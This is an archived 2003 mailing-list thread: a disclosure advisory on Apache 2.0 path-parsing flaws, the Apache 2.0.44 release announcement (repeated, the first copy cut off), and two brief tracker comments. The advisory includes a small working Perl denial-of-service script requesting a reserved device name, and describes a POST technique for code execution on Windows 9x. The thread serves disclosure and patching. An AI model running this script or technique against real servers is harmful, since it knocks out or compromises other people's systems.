Path Parsing Errata in Apache HTTP Server From: "mattmurphy@kc.rr.com" <mattmurphy@kc.rr.com> To: vulnwatch@vulnwatch.org, news@securiteam.com, bugtraq@securityfocus.com Date: 2003-01-22 15.48 Original Message: ----------------- From: mattmurphy@kc.rr.com mattmurphy@kc.rr.com Date: Wed, 22 Jan 2003 09:00:58 -0500 To: full-disclosure@lists.netsys.com Subject: Path Parsing Errata in Apache HTTP Server Path Parsing Errata in Apache HTTP Server ABSTRACT The Apache HTTP Server <http://httpd.apache.org/> powers a whopping two thirds of all internet web sites, offering such powerful features as SSI, pre-forked and multi-threaded MPMs, input and output filtering, advanced logging, dynamic actions, dynamic modules, reverse DNS, virtual hosting, and even SSL via a fully extensible interface. It operates on an incredible number of platforms, including nearly all major Unix variants, Novell Netware and Microsoft Windows; Apache has also been ported to cygwin. DESCRIPTION The Apache HTTP Server contains several flaws related to its path mapping routines that could enable an attacker to cause Apache to handle files incorrectly, cause a system-wide denial of service, or possibly execute arbitrary code. ANALYSIS Issue 1 (VU#979793): Exploitation of this condition leads to a remote denial of service against a Windows 9x system running Apache, and appears to be due to erroneous checks in the ap_directory_walk function. A denial of service can be caused with a web browser by requesting a reserved device such as "aux": --- Apache2-nuke.pl --- #!/usr/bin/perl use IO::Socket; if (@ARGV < 1 || @ARGV > 2) { print STDOUT "Usage: perl $0 <host> <port=80>"; exit; } if (@ARGV == 2) { $port = $ARGV[1]; } else { $port = 80; } $f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], PeerPort=>$port); print $f "GET /aux HTTP/1.0\r\n\r\n"; --- Apache2-nuke.pl --- The Apache 2.0.44 release announcement incorrectly states that previous Microsoft patches eliminate this vulnerability. There are some devices on Windows platforms that will hang the system if opened with certain file permissions masks. Issue 2 (VU#825177): Exploitation of this condition leads to a remote compromise. This issue is also restricted to Windows 9x versions of Apache, and has the same underlying cause as the previously noted denial of service condition. It is related to CGI input redirection. Specifically, when POSTing to a CGI, the stdin stream points to the input form data. By sending a POST to "con.xxx" in a ScriptAlias'ed directory, your POST data *may* be executed by that interpreter. Issue 3 (VU#384033): Exploitation of this condition could lead to bypass of default script mapping behavior. This flaw impacts Apache on all platforms. This issue is best described with an example: http://localhost/folder.php/file Apache should parse 'file' as plain text -- that is, simply returning it to the browser. However, an incorrect check in Apache's mapping algorithms, causes the 'php' extension to be associated with this request. Rather than checking only the file's extension, Apache checks for extensions in any path member, stopping at the first. This is more of a weakness than a vulnerability, as exploitation only yields UID nobody if you allow uploading under the docroot *and* filter by filename only, in which case you have far more serious concerns than the exploitation of this issue. DETECTION These issues are believed to be specific to the 2.0 branch; Apache 1.3.27 (and all other 1.x versions) are believed immune from these issues. Apache 2.0.43 and prior should be upgraded to the 2.0.44 release, which will be available from <http://httpd.apache.org/dist/httpd>. WORKAROUNDS * I recommend that servers running Windows 9x be upgraded to a production environment (Windows NT, 2000, or XP, for example). This offers a solution to VU#979793, and VU#825177. * A configuration workaround is available for VU#384033. For any directories allowing uploads, add the following lines: <Directory "/var/apache/htdocs/uploads/"> AllowOverride None Options -Includes -ExecCGI SetHandler default-handler </Directory> * All sites running Apache 2.0.43 and prior should be upgraded to 2.0.44 if impacted by these issues. DISCLOSURE TIMELINE December 4, 2002: security@apache.org notified December 5, 2002: Confirmation response received from William Rowe, Jr. (wrowe@rowe-clan.net); auditing begins. December 5, 2002: cert@cert.org contacted December 5, 2002: Automated response from CERT/CC incident response. December 9, 2002: Follow-up received from William Rowe, Jr. indicates that cause of reserved device issue has been identified. December 10, 2002: Initial patch binaries received from William Rowe, Jr. (libapr.dll and libhttpd.dll). Fix for reserved device flaw confirmed, but dot-in-path attack remains. December 10, 2002: CERT/CC response received from Chad Dougherty; vulnerability IDs are assigned. December 10, 2002: Reply to Chad Dougherty indicating that precise details of VU#825177 will not be immediately disclosed. December 10, 2002: Reply to William Rowe, Jr. requesting confirmation of status and receipt of VU#384033. December 10/11, 2002: Series of e-mail communications to clarify the impacts/origins of VU#384033; source of issue is identified. January 20, 2002: Apache 2.0.44 released January 22, 2002: Public disclosure -------------------------------------------------------------------- mail2web - Check your email from the web at http://mail2web.com/ .
[ANNOUNCE] Apache 2.0.44 Released From: Lars Eilebrecht <lars@apache.org> (The Apache Software Foundation) To: bugtraq@securityfocus.com Date: 2003-01-23 00.41 -----BEGIN PGP SIGNED MESSAGE----- The Apache Software Foundation and The Apache HTTP Server Project are pleased to announce the seventh public release of the Apache 2.0 HTTP Server. This Announcement notes the significant changes in 2.0.44 as compared to 2.0.43. This version of Apache is principally a security and bug fix release. A summary of the bug fixes is given at the end of this document. Of particular note is that 2.0.44 addresses three security vulnerabilities affecting the Windows platform. VU#979793 Versions of Windows 9x and Me could be crashed by a malicious request to Apache that contains a MS-DOS device name. This is a known security issues in Microsoft Windows for which a fix is available: http://www.microsoft.com/technet/Security/Bulletin/ms00-017.asp Apache 2.0.44 has also been patched to correctly filter MS-DOS device names preventing the crash even if the Microsoft update is not applied (cve.mitre.org: CAN-2003-0016 [1]). VU#825177 As a consequence of VU#979793, a remote attacker can run arbitrary code on a server running Apache under Windows 9x and Me by sending a carefully crafted POST request containing a MS-DOS device name (cve.mitre.org: CAN-2003-0016 [1]). On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL (cve.mitre.org: CAN-2003-0017 [2]). The Apache Software Foundation would like to thank Matthew Murphy and Lionel Brits for the responsible reporting of these issues. The 2.0.44 release marks a change in the Apache release process and a new level of stability in the 2.0 series. Beginning with this release, we will make every effort to retain forward compatibility in the configuration and module API, so that upgrading along the 2.0 series should be much easier. This compatibility extends backwards to 2.0.42, so users of that version or later should be able to upgrade without changing configurations or updating DSO modules. (Users of earlier releases will need to recompile all modules in order to upgrade to 2.0.44.) We consider this release to be the best version of Apache available and encourage users of all prior versions to upgrade. Apache 2.0.44 is available for download from http://httpd.apache.org/download.cgi Please see the CHANGES_2.0 file, linked from the above page, for a full list of changes. Apache 2.0 offers numerous enhancements, improvements, and performance boosts over the 1.3 codebase. For an overview of new features introduced after 1.3 please see http://httpd.apache.org/docs-2.0/new_features_2_0.html When upgrading or installing this version of Apache, please keep in mind the following: If you intend to use Apache with one of the threaded MPMs, you must ensure that the modules (and the libraries they depend on) that you will be using are thread-safe. Please contact the vendors of these modules to obtain this information. Apache 2.0.44 Major changes Security vulnerabilities closed since Apache 2.0.43 *) Fixed the security vulnerability noted in VU#979793: Apache vulnerable to DoS via request for MS-DOS device on Windows 9x and Me. *) Fixed the security vulnerability noted in VU#825177: Apache allows arbitrary code execution via crafted POST request containing MS-DOS device name on Windows 9x and Me. *) Fix CAN-2002-0017: On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL. Bugs fixed and features added since Apache 2.0.43 *) mod_autoindex: Bring forward the IndexOptions IgnoreCase option from Apache 1.3. PR 14276 [David Shane Holden <dpejesh@yahoo.com>, William Rowe] *) mod_mime: Workaround to prevent a segfault if r->filename=NULL [Brian Pane] *) Reorder the definitions for mod_ldap and mod_auth_ldap within config.m4 to make sure the parent mod_ldap is defined first. This ensures that mod_ldap comes before mod_auth_ldap in the httpd.conf file, which is necessary for mod_auth_ldap to load. PR 14256 [Graham Leggett] *) Fix the building of cgi command lines when the query string contains '='. PR 13914 [Ville Skytt
[ANNOUNCE] Apache 2.0.44 Released From: Lars Eilebrecht <lars@apache.org> (The Apache Software Foundation) To: bugtraq@securityfocus.com Date: 2003-01-23 00.41 -----BEGIN PGP SIGNED MESSAGE----- The Apache Software Foundation and The Apache HTTP Server Project are pleased to announce the seventh public release of the Apache 2.0 HTTP Server. This Announcement notes the significant changes in 2.0.44 as compared to 2.0.43. This version of Apache is principally a security and bug fix release. A summary of the bug fixes is given at the end of this document. Of particular note is that 2.0.44 addresses three security vulnerabilities affecting the Windows platform. VU#979793 Versions of Windows 9x and Me could be crashed by a malicious request to Apache that contains a MS-DOS device name. This is a known security issues in Microsoft Windows for which a fix is available: http://www.microsoft.com/technet/Security/Bulletin/ms00-017.asp Apache 2.0.44 has also been patched to correctly filter MS-DOS device names preventing the crash even if the Microsoft update is not applied (cve.mitre.org: CAN-2003-0016 [1]). VU#825177 As a consequence of VU#979793, a remote attacker can run arbitrary code on a server running Apache under Windows 9x and Me by sending a carefully crafted POST request containing a MS-DOS device name (cve.mitre.org: CAN-2003-0016 [1]). On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL (cve.mitre.org: CAN-2003-0017 [2]). The Apache Software Foundation would like to thank Matthew Murphy and Lionel Brits for the responsible reporting of these issues. The 2.0.44 release marks a change in the Apache release process and a new level of stability in the 2.0 series. Beginning with this release, we will make every effort to retain forward compatibility in the configuration and module API, so that upgrading along the 2.0 series should be much easier. This compatibility extends backwards to 2.0.42, so users of that version or later should be able to upgrade without changing configurations or updating DSO modules. (Users of earlier releases will need to recompile all modules in order to upgrade to 2.0.44.) We consider this release to be the best version of Apache available and encourage users of all prior versions to upgrade. Apache 2.0.44 is available for download from http://httpd.apache.org/download.cgi Please see the CHANGES_2.0 file, linked from the above page, for a full list of changes. Apache 2.0 offers numerous enhancements, improvements, and performance boosts over the 1.3 codebase. For an overview of new features introduced after 1.3 please see http://httpd.apache.org/docs-2.0/new_features_2_0.html When upgrading or installing this version of Apache, please keep in mind the following: If you intend to use Apache with one of the threaded MPMs, you must ensure that the modules (and the libraries they depend on) that you will be using are thread-safe. Please contact the vendors of these modules to obtain this information. Apache 2.0.44 Major changes Security vulnerabilities closed since Apache 2.0.43 *) Fixed the security vulnerability noted in VU#979793: Apache vulnerable to DoS via request for MS-DOS device on Windows 9x and Me. *) Fixed the security vulnerability noted in VU#825177: Apache allows arbitrary code execution via crafted POST request containing MS-DOS device name on Windows 9x and Me. *) Fix CAN-2002-0017: On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL. Bugs fixed and features added since Apache 2.0.43 *) mod_autoindex: Bring forward the IndexOptions IgnoreCase option from Apache 1.3. PR 14276 [David Shane Holden <dpejesh@yahoo.com>, William Rowe] *) mod_mime: Workaround to prevent a segfault if r->filename=NULL [Brian Pane] *) Reorder the definitions for mod_ldap and mod_auth_ldap within config.m4 to make sure the parent mod_ldap is defined first. This ensures that mod_ldap comes before mod_auth_ldap in the httpd.conf file, which is necessary for mod_auth_ldap to load. PR 14256 [Graham Leggett] *) Fix the building of cgi command lines when the query string contains '='. PR 13914 [Ville Skyttä <ville.skytta@iki.fi>, Jeff Trawick] *) Rename CacheMaxStreamingBuffer to MCacheMaxStreamingBuffer. Move implementation of MCacheMaxStreamingBuffer from mod_cache to mod_mem_cache. MCacheMaxStreamingBuffer now defaults to the lesser of 100,000 bytes or MCacheMaxCacheObjectSize. This should eliminate the need for explicitly coding MCacheMaxStreamingBuffer in most configurations. [Bill Stoddard] *) Replace APU_HAS_LDAPSSL_CLIENT_INIT with APU_HAS_LDAP_NETSCAPE_SSL as set by apr-util in util_ldap.c. This should allow mod_ldap to work with the Netscape/Mozilla LDAP library. [Øyvin Sømme <somme@oslo.westerngeco.slb.com>, Graham Leggett] *) Fix critical bug in new --enable-v4-mapped configure option implementation which broke IPv4 listening sockets on some systems. [hiroyuki hanai <hanai@imgsrc.co.jp>] *) mod_setenvif: Fix BrowserMatchNoCase support for non-regex patterns [André Malo <nd@perlig.de>] *) Add version string to provider API. [Justin Erenkrantz] *) mod_negotiation: Set the appropriate mime response headers (Content-Type, charset, Content-Language and Content-Encoding) for negotated type-map "Body:" responses (such as the error pages.) [André Malo <nd@perlig.de>] *) mod_log_config: Allow '%%' escaping in CustomLog format strings to insert a literal, single '%'. [André Malo <nd@perlig.de>] *) mod_autoindex: AddDescription directives for directories now work as in Apache 1.3, where no trailing '/' is specified on the directory name. Previously, the trailing '/' *had* to be specified, which was incompatible with Apache 1.3. PR 7990 [Jeff Trawick] *) Fix for PR 14556. The expiry calculations in mod_cache were trying to perform "now + ((date - lastmod) * factor)" where date == lastmod resulting in "now + 0". The code now follows the else path (using the default expiration) if date is equal to lastmod. [rx@armstrike.com (Sergey), Paul J. Reder] *) Use AP_DECLARE in the debug versions of ap_strXXX in case the default calling convention is not the same as the one used by AP_DECLARE. [Juan Rivera <Juan.Rivera@citrix.com>] *) mod_cache: Don't cache response header fields designated as hop-by-hop headers in HTTP/1.1 (RFC 2616 Section 13.5.1). [Estrade Matthieu <estrade-m@ifrance.com>, Brian Pane] *) mod_cgid: Handle environment variables containing newlines. PR 14550 [Piotr Czejkowski <apache@czarny.eu.org>, Jeff Trawick] *) Move mod_ext_filter out of experimental and into filters. [Jeff Trawick] *) Fixed a memory leak in mod_deflate with dynamic content. PR 14321 [Ken Franken <kfranken@decisionmark.com>] *) Add --[enable|disable]-v4-mapped configure option to control whether or not Apache expects to handle IPv4 connections on IPv6 listening sockets. Either setting will work on systems with the IPV6_V6ONLY socket option. --enable-v4-mapped must be used on systems that always allow IPv4 connections on IPv6 listening sockets. PR 14037 (Bugzilla), PR 7492 (Gnats) [Jeff Trawick] *) This fixes a problem where the underlying cache code indicated that there was one more element on the cache than there actually was. This happened since element 0 exists but is not used. This code allocates the correct number of useable elements and reports the number of actually used elements. The previous code only allowed MCacheMaxObjectCount-1 objects to be stored in the cache. [Paul J. Reder] *) mod_setenvif: Add SERVER_ADDR special keyword to allow envariable setting according to the server IP address which received the request. [Ken Coar] *) mod_cgid: Terminate CGI scripts when the client connection drops. PR 8388 [Jeff Trawick] *) Rearrange OpenSSL engine initialization to support RAND redirection on crypto accelerator. [Frederic DONNAT <frederic.donnat@zencod.com>] *) Always emit Vary header if mod_deflate is involved in the request. [Andre Malo <nd@perlig.de>] *) mod_isapi: Stop unsetting the 'empty' query string result with a NULL argument in ecb->lpszQueryString, eliminating segfaults for some ISAPI modules. PR 14399 [Detlev Vendt <detlev.vendt@brillit.de>] *) mod_isapi: Fix an issue where the HSE_REQ_DONE_WITH_SESSION notification is received before the HttpExtensionProc() returns HSE_STATUS_PENDING. This only affected isapi .dll's configured with the ISAPIFakeAsync on directive. PR 11918 [John DeSetto <jdesetto@radiantsystems.com>, William Rowe] *) mod_isapi: Fix the issue where all results from mod_isapi would run through the core die handler resulting in invalid responses or access log entries. PR 10216 [William Rowe] *) Improves the user friendliness of the CacheRoot processing over my last pass. This version avoids the pool allocations but doesn't avoid all of the runtime checks. It no longer terminates during post-config processing. An error is logged once per worker, indicating that the CacheRoot needs to be set. [Paul J. Reder] *) Fix a bug where we keep files open until the end of a keepalive connection, which can result in: (24)Too many open files: file permissions deny server access especially on threaded servers. [Greg Ames, Jeff Trawick] *) Fix a bug in which mod_proxy sent an invalid Content-Length when a proxied URL was invoked as a server-side include within a page generated in response to a form POST. [Brian Pane] *) Added code to process min and max file size directives and to init the expirychk flag in mod_disk_cache. Added a clarifying comment to cache_util. [Paul J. Reder] *) The value emitted by ServerSignature now mimics the Server HTTP header as controlled by ServerTokens. [Francis Daly <deva@daoine.org>] *) Gracefully handly retry situations in the SSL input filter, by following the SSL libraries' retry semantics. [William Rowe] *) Terminate CGI scripts when the client connection drops. This fix only applies to some normal paths in mod_cgi. mod_cgid is still busted. PR 8388 [Jeff Trawick] *) Fix a bug where 416 "Range not satisfiable" was being returned for content that should have been redirected. [Greg Ames] *) Fix memory leak in mod_ssl from internal SSL library allocations within SSL_get_peer_certificate and X509_get_pubkey. [Zvi Har'El <rl@math.technion.ac.il> Madhusudan Mathihalli <madhusudan_mathihalli@hp.com>]. *) mod_ssl uses free() inappropriately in several places, to free memory which has been previously allocated inside OpenSSL. Such memory should be freed with OPENSSL_free(), not with free(). [Nadav Har'El <nyh@math.technion.ac.il>, Madhusudan Mathihalli <madhusudan_mathihalli@hp.com>]. *) Emit a message to the error log when we return 404 because the URI contained '%2f'. (This was previously nastily silent and difficult to debug.) [Ken Coar] *) Fix streaming output from an nph- CGI script. CGI:IRC now works. PR 8482 [Jeff Trawick] *) More accurate logging of bytes sent in mod_logio when the client terminates the connection before the response is completely sent [Bojan Smojver <bojan@rexursive.com>] *) Fix some problems in the perchild MPM. [Jonas Eriksson <jonas@webkonsulterna.com>] *) Change the CacheRoot processing to check for a required value at config time. This saves a lot of wasted processing if the mod_disk_cache module is loaded but no CacheRoot was provided. This fix also adds code to log an error and avoid useless pallocs and procesing when the computed cache file name cannot be opened. This also updates the docs accordingly. [Paul J. Reder] *) Introduce the EnableSendfile directive, allowing users of NFS shares to disable sendfile mechanics when they either fail outright or provide intermitantly corrupted data. PR [William Rowe] *) Resolve the error "An operation was attempted on something that is not a socket. : winnt_accept: AcceptEx failed. Attempting to recover." for users of various firewall and anti-virus software on Windows. PR 8325 [William Rowe] *) Add the ProxyBadHeader directive, which gives the admin some control on how mod_proxy should handle bogus HTTP headers from proxied servers. This allows 2.0 to "emulate" 1.3's behavior if desired. [Jim Jagielski] *) Change the LDAP modules to export their symbols correctly during a Windows build. Add dsp files for Windows. Update README.ldap file for Windows build instructions. [Andre Schild <A.Schild@aarboard.ch>] *) Performance improvements for the code that generates HTTP response headers [Brian Pane] *) Add -S as a synonym for -t -DDUMP_VHOSTS. [Thom May <thom@planetarytramp.net>] *) Fix a bug with dbm rewrite maps which caused the wrong value to be used when the key was not found in the dbm. PR 13204 [Jeff Trawick] *) Fix a problem with streaming script output and mod_cgid. [Jeff Trawick] *) Add ap_register_provider/ap_lookup_provider API. [John K. Sterling <john@sterls.com>, Justin Erenkrantz] References [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0016 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQCSAwUBPi8sLD6Pt/L4g0HZAQGLvwPkDkm8STOrBrER006N1XA+yIulDYCu7RC+ eOyqM8L9mV8VWn3WnJEcew5O6h3YVawKjP5glpvnYewZnDC0/YaouvW/i1kWx+Nq 5xj7GDVIKkCi8LPTfpJiLQjZ8V3SkRNAm26piipHbPP1mm2ytYvbAmAuOclo68HL cOoYyME= =e6Yn -----END PGP SIGNATURE-----
apache-2.0.44 is already in the tree. please close this.
like i said -- already in the tree, dude.
